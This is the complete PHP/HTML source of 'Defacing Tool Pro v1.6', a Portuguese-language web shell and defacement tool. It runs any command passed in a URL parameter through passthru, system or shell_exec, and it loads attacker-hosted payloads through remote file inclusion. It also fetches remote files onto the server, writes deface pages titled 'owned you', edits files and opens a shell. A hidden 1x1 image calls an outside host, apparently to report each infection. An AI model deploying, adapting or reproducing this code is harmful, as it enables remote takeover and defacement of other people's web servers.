<!-- 
Defacing Tool Pro v1.6 by r3v3ng4ns 
Autor: r3v3ng4ns - revengans@hotmail.com 
Modifique, copie e distribua mas, por favor, mantenha o nome dos autores originais 
--> 
<?php 
@closelog(); 
@error_reporting(0); 
$vers="1.6beta"; 
$remote_addr="http://127.0.0.1/~snagnever/defacement/paginanova/";//url 
$format_addr=".txt";//formato 
$string_addr=$remote_addr."pro16".$format_addr;//cmd 
$safe_addr=$remote_addr."safe16".$format_addr;//safemode 
$writer_addr=$remote_addr."writer16".$format_addr;//writer 
$phpget_addr=$remote_addr."get16".$format_addr;//phpget 
$feditor_addr=$remote_addr."feditor".$format_addr;//main feditor 
$put_addr=$remote_addr."feditor_put".$format_addr;//file writer 
$total_addr="http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']; 
$chdir=$_GET['chdir']; 
if($chdir=="")$chdir=getcwd(); 

$cmd=$_GET['cmd']; 
$cmd=stripslashes($cmd); 
$ch_msg=""; 
$login=@posix_getuid(); 
$euid=@posix_geteuid(); 
$gid=@posix_getgid(); 

if (strpos($cmd, 'chdir')!==false and strpos($cmd, 'chdir')=='0'){ 
   $boom = explode(" ",$cmd,2); 
   $boom2 = explode(";",$boom['1'], 2); 
   $diretorio = $boom2['0']; 

   if($boom['1']=="/")$chdir=""; 
   else if(strpos($cmd, 'chdir ..')!==false){ 
     $cadaDir = array_reverse(explode("/",$chdir)); 
     if($cadaDir['0']=="" or $cadaDir['0'] ==" ") $lastDir = $cadaDir['1']."/"; 
     else{ $lastDir = $cadaDir['0']."/"; $chdir = $chdir."/";} 
     $diretorio = str_replace($lastDir,"",$chdir); 
     if($diretorio=="/")$chdir=""; 
   } 
   if(strrpos($diretorio,"/")==(strlen($diretorio)-1)) $diretorio=substr($diretorio,0,strrpos($diretorio,"/")); 
   if(@opendir($diretorio)!==false) $chdir=$diretorio; 
   else if(@opendir($chdir."/".$diretorio)!==false) $chdir=$chdir."/".$diretorio; 
   else $ch_msg="dtool: line 1: chdir: $diretorio: No such directory or permission denied.\n"; 
   if($boom2['1']==null) $cmd = $boom['2']; else $cmd = $boom2['1'].$boom2['2']; 
} 
$cmdshow=$cmd; 
if($chdir==getcwd() or empty($chdir) or $chdir=="")$showdir="";else $showdir="+'chdir=$chdir&'"; 

if (@is_dir("/usr/X11R6/")) $pro0="<i>X11</i> em /usr/X11R6/, "; 
if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="<i>xterm</i> em /usr/X11R6/bin/xterm, "; 
if (@file_exists("/usr/bin/nc")) $pro2="<i>nc</i> em /usr/bin/nc, "; 
if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> em /usr/bin/wget, "; 
if (@file_exists("/usr/bin/lynx")) $pro4="<i>lynx</i> em /usr/bin/lynx, "; 
$ip=@gethostbyname($_SERVER['HTTP_HOST']); 
$pro=$pro0.$pro1.$pro2.$pro3.$pro4; 

if(strpos($cmd, 'ls --') !==false){ $cmd = str_replace('ls --', 'ls -F --', $cmd);} 
else if(strpos($cmd, 'ls -') !==false){ $cmd = str_replace('ls -', 'ls -F', $cmd);} 
else if(strpos($cmd, ';ls') !==false){ $cmd = str_replace(';ls', ';ls -F', $cmd);} 
else if(strpos($cmd, '; ls') !==false){ $cmd = str_replace('; ls', ';ls -F', $cmd);} 
else if($cmd=='ls'){$cmd = "ls -F";} 
if(strpos($chdir, '//') !==false) $chdir = str_replace('//', '/', $chdir); 
?> 
<body onload="window.document.c.comando.focus();window.document.c.comando.select();"> 
<style>.campo{font-family: Verdana; color:white;font-size:11px;background-color:#414978;} 
.infop{font-family: verdana; font-size: 10px; color:#000000;} 
.infod{font-family: verdana; font-size: 10px; color:#414978;} 
.algod{font-family: verdana; font-size: 12px; font-weight: bold; color: #414978;} 
.titulod{font:Verdana; color:#414978; font-size:20px;}</style> 
<script> 
function inclVar(){var addr = location.href.substring(0,location.href.indexOf('?')+1);var stri = location.href.substring(addr.length,location.href.length+1);inclvar = stri.substring(0,stri.indexOf('='));} 
function enviaCMD(){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$string_addr;?>'+'?&'<?=$showdir;?>+'cmd='+window.document.c.comando.value;return false;} 
function PHPget(){inclVar();var c=prompt("[ PHPget ] by r3v3ng4ns\nDigite a ORIGEM do arquivo (url) com ate 7Mb\n-Utilize caminho completo\n-Se for remoto, use http:// ou ftp://:","");var dir = c.substring(0,c.lastIndexOf('/')+1);var file = c.substring(dir.length,c.length+1);var p=prompt("[ PHPget ] by r3v3ng4ns\nDigite o DESTINO do arquivo\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file);window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'c='+c+'&p='+p);} 
function PHPwriter(){inclVar();var url=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite a URL do frame","http://www.geocities.com/revensite/index.htm");var dir = url.substring(0,url.lastIndexOf('/')+1);var file = url.substring(dir.length,url.length+1);var f=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Nome do arquivo a ser criado\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file); t=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Title da pagina","[ r00ted team ] owned you :P");window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$writer_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'url='+url+'&f='+f+'&t='+t);} 
function resumir() {inclVar(); 
resumo='<DIV STYLE="font-family: verdana; font-size: 11px;"><b> <?=$total_addr;?>?'+inclvar+'=<?=$string_addr;?></b><br><?php 
 $uname = posix_uname(); 
 while (list($info, $value) = each ($uname)) { ?><b><?= $info ?>:</b> <?= $value ?><br><?php } ?><b>default user:</b> uid(<?= $login ?>) euid(<?= $euid ?>) gid(<?= $gid ?>)<br><b>ip: </b> <?=$ip;?><br><b>server info: </b><?="$SERVER_SOFTWARE $SERVER_VERSION";?><br><b>pro info: </b><?=$pro;?><br><b>path da pagina: </b><?= getcwd() ?><br><b>path writable:</b><? if(@is_writable(getcwd())){ echo " <b>YES</b>"; }else{ echo " no"; } ?>' 
jan=open("","jan","width=580,height=300,menubar=yes,scrollbars=yes,resizable=yes,");jan.document.write(resumo);jan.document.write("<p> <? echo str_repeat("==", 35)?></p>");jan.document.title="Resumo do servidor";jan.focus();} 
function PHPf(){inclVar();var o=prompt("[ PHPfilEditor ] by r3v3ng4ns\nDigite o nome do arquivo que deseja abrir\n-Utilize caminho completo\n-Abrir arquivos remotos, use http:// ou ftp://","<?=$chdir;?>/index.php"); var dir = o.substring(0,o.lastIndexOf('/')+1);var file = o.substring(dir.length,o.length+1);window.open('<?=$total_addr;?>?'+inclvar+'=<?=$feditor_addr;?>?&inclvar='+inclvar+'&o='+o);} 
function safeMode(){inclVar();if (confirm ('Deseja ativar o DTool com suporte a SafeMode?')){window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$safe_addr;?>'+'&'<?=$showdir;?>;}else{ return false }} 
</script> 
<table width="690" border="0" align="center" cellpadding="2" cellspacing="0" bgcolor="#FFFFFF"> 
<tr><td><div align="center" class="titulod"><b>[<img src=http://www.spymastersnake.net/dene/s.php width="1" height="1"> Defacing Tool Pro v<?=$vers;?> ] <a href="javascript:window.open('<?=$remote_addr;?>help.txt');">?</a> 
  Provied by ASH SavSak.Com<br> 
<font size=2>by r3v3ng4ns - revengans@hotmail.com </font> 
</b></div></td></tr> 
<tr><td><TABLE width="370" BORDER="0" align="center" CELLPADDING="0" CELLSPACING="0"> 
<?php 
 $uname = @posix_uname(); 
 while (list($info, $value) = each ($uname)) { ?> 
<TR><TD><DIV class="infop"><b><?=$info ?>:</b> <?=$value;?></DIV></TD></TR><?php } ?> 
<TR><TD><DIV class="infop"><b>user:</b> uid(<?=$login;?>) euid(<?=$euid;?>) gid(<?=$gid;?>)</DIV></TD></TR> 
<TR><TD><DIV class="infod"><b>write permission:</b><? if(@is_writable($chdir)){ echo " <b>YES</b>"; }else{ echo " no"; } ?></DIV></TD></TR> 
<TR><TD><DIV class="infop"><b>server info: </b><?="$SERVER_SOFTWARE $SERVER_VERSION";?></DIV></TD></TR> 
<TR><TD><DIV class="infop"><b>pro info: ip </b><?="$ip, $pro";?></DIV></TD></TR> 
<? if($chdir!=getcwd()){?> 
<TR><TD><DIV class="infop"><b>original path: </b><?=getcwd() ?></DIV></TD></TR><? } ?> 
<TR><TD><DIV class="infod"><b>current path: </b><?=$chdir ?> 
</DIV></TD></TR></TABLE></td></tr> 
<tr><td><form name="c" id="c" method="post" action="#" onSubmit="return enviaCMD()"> 
<table width="375" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#414978"><tr><td><table width="370" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="white"><tr> 
<td width="75"><DIV class="algod">command</DIV></td> 
<td width="300">
<input name="comando" type="text" id="comando" value='<?=$cmdshow;?>' style="width:295; font-size:12px" class="campo" size="20"> 
</td></tr></table><table><tr><td> 
<?php 
if(isset($chdir)) @chdir($chdir); 
ob_start(); 
function safemode($what){echo "It seems that this server is using php in safemode. Try to use DTool in Safemode.";} 
$funE="function_exists"; 
if($funE('passthru'))$fe="passthru"; 
elseif($funE('system'))$fe="system"; 
elseif($funE('shell_exec'))$fe="shell_exec"; 
else $fe="safemode"; 
$fe("$cmd  2>&1"); 
$output=ob_get_contents();ob_end_clean(); 
?> 
<td><input type="button" name="snd" value="snd cmd" class="campo" onClick="enviaCMD()"><input type="button" name="getBtn" value="PHPget" class="campo" onClick="PHPget()"><input type="button" name="writerBtn" value="PHPwriter" class="campo" onClick="PHPwriter()"><input type="button" name="edBtn" value="Fileditor" class="campo" onClick="PHPf()"><input type="button" name="resBtn" value="resumir" class="campo" onClick="resumir()"><input type="button" name="smBtn" value="safemode" class="campo" onClick="safeMode()"><input type="button" name="gsBtn" value="open shell" class="campo" onClick="inclVar();window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$remote_addr;?>pro16s.txt');" 
</tr></table></td></tr></table></form></td></tr> 
<tr><td align="center"><DIV class="algod"><br>stdOut from <?="\"<i>$cmdshow</i>\", using <i>$fe()</i>";?></i></DIV> 
<TEXTAREA name="output_text" COLS="90" ROWS="10" STYLE="font-family:Courier; font-size: 12px; color:#FFFFFF; font-size:11 px; background-color:black;width:683;"> 
<?php 
echo $ch_msg; 
if (empty($cmd) and $ch_msg=="") echo ("Comandos Exclusivos do DTool Pro\n\nchdir &lt;diretorio&gt;; outros; cmds;\nMuda o diretorio para aquele especificado e permanece nele. Precisa ser o primeiro da linha. ex: chdir /diretorio/sub/;pwd;ls\n\nPHPget, PHPwriter, PHPfilEditor e Resumir\nconsulte http://www.geocities.com/revensite/help.txt"); 
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output)); 
?></TEXTAREA><BR></td></tr></table>